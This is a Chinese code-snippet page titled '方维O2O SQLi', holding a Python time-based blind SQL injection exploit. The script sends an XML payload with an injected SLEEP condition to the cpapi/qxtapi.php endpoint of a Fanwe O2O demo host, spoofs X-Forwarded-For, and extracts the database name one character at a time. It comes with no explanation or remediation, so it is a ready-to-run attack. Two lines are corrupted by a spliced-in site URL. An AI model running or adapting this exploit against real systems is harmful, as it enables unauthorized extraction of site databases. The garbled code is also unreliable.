首页 > 代码库 > 方维O2O SQLi
方维O2O SQLi
1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 4 from __future__ import print_function 5 6 import requests 7 8 host = "http://o2odemo.fanwe.net/" 9 10 statement = "IF(ORD(SUBSTRING((DATABASE()), %s, 1)) = %s, SLEEP(1), 0)" 11 characters = list(" !\"#$%&‘()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~") 12 13 def main(): 14 headers = { 15 "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0", 16 "X-Forwarded-For": "221.179.180.156"} 17 18 payload = "<A><Body><Message><SrcMobile>0</SrcMobile><Content>0</Content><RecvTime>0‘ OR %s#</RecvTime></Message></Body></A>" % statement 19 20 info = str() 21 for i in range(1, 42): 22 for c in characters: 23 try: 24 data = http://www.mamicode.com/payload % (i, ord(c)) 25 r = requests.post(host + "cpapi/qxtapi.php", headers=headers, data=http://www.mamicode.com/data, timeout=6) 26 except requests.Timeout as e: 27 info += c 28 print("\n[In Progress]: %s" % info) 29 break 30 else: 31 print(">", end="") 32 33 print("\n[Done]: %s" % info) 34 35 if __name__ == "__main__": 36 main()
方维O2O SQLi
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。